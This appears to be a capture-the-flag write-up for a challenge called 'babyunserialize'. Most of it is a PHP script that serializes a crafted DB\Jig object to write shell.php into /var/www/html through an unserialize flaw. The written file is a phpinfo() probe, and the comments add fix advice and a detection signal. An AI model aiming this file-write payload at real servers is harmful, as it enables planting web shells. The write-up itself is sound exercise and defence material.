babyunserialize
通过目录扫描得到源码包 www.zip。
jig.php 存在任意文件写入:反序列化下面构造的 Jig 对象即可触发写文件,从而直接 getshell。
<?php
namespace DB;
/**
 * Local stand-in for the application's DB\Jig class, declared only so that
 * serialize() emits an object with these property names and values.
 *
 * It carries no methods: whatever happens on the receiving side is done by
 * the application's own jig.php, which the write-up says contains an
 * arbitrary file write. That code is not shown on this page.
 *
 * NOTE(review): the root cause is presumably unserialize() being called on
 * request-controlled data (the entry point is not shown here). The usual fix
 * is to decode such input with json_decode(), or to call
 * unserialize($input, ['allowed_classes' => false]).
 */
class Jig
{
    const FORMAT_JSON = 0;
    const FORMAT_Serialized = 1;

    // Declaration order and protected visibility are preserved on purpose:
    // both are reflected in the serialized representation.

    // Base directory value taken from the write-up (the web root).
    protected $dir = '/var/www/html/';

    protected $format = self::FORMAT_JSON;

    // File name => record map; the record body here is a harmless phpinfo() probe.
    protected $data = [
        'shell.php' => ['a' => '<?php phpinfo();?>'],
    ];

    // Truthy flag; presumably what makes the real class flush $data to disk.
    // TODO confirm against the application's jig.php.
    protected $lazy = 1;
}
// Print the serialized object in URL-encoded form. Encoding is required because
// protected property names are serialized with embedded NUL bytes, which would
// not survive being pasted into a request parameter as-is.
// Detection note: parameter values that start with "O%3A" (a URL-encoded
// serialized PHP object) are a useful signal in web/WAF logs.
echo urlencode(serialize(new Jig()));